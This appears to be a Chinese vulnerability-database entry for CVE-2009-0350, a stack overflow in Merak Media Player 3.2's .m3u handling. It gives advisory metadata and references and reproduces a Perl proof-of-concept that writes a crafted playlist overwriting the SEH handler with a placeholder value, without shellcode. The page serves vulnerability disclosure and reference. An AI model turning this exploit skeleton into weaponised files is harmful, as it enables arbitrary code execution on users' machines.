Merak Media Player .m3u文件处理栈溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117286 漏洞类型 缓冲区溢出
发布时间 2009-01-25 更新时间 2009-03-03
CVE编号 CVE-2009-0350 CNNVD-ID CNNVD-200901-446
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/7857
https://www.securityfocus.com/bid/33419
https://cxsecurity.com/issue/WLB-2009010249
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-446
|漏洞详情
MerakMediaPlayer中文名为木子播放器,支持多种文件格式。MerakMediaPlayer在处理状态栏图标的ToolTip文本时存在栈溢出漏洞,如果用户受骗打开了特制的播放列表(.m3u)文件就可以触发这个溢出,导致执行任意代码。
|漏洞EXP
#!/usr/bin/perl -w

# Author : Houssamix

# Merak Media Player V3.2  m3u file Local Buffer overflow (SEH) 
# Download :  http://www.qwerks.com/download/3748/merak.zip

# --------------------------------------------
# EAX 00000000
# ECX 45454545
# EDX 7C9137D8 ntdll.7C9137D8
# EBX 00000000
# ESP 0013F784
# EBP 0013F7A4
# ESI 00000000
# EDI 00000000
# EIP 45454545

# 0013FBE4   42424242  Pointer to next SEH record
# 0013FBE8   45454545  SE handler
# ---------------------------------------------

print "===================================================================== \n";
print "Author : Houssamix 						     \n";
print "===================================================================== \n";
print "Merak Media Player V3.2  m3u file Local Buffer overflow (SEH) 		 \n";
print "===================================================================== \n";

my $buf = "\x42" x 78;
my $seh = "\x45\x45\x45\x45";
my $buff = "\x43" x 1120;
my $file="hsmx.m3u";
$exploit = $buf.$seh.$buff;
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $exploit ;
close($FILE);
print "$file has been created \n";

# milw0rm.com [2009-01-25]
|受影响的产品
Qwerks Merak Media Player 3.2
|参考资料

来源:MILW0RM
名称:7857
链接:http://www.milw0rm.com/exploits/7857
来源:SECUNIA
名称:33645
链接:http://secunia.com/advisories/33645
来源:OSVDB
名称:51565
链接:http://osvdb.org/51565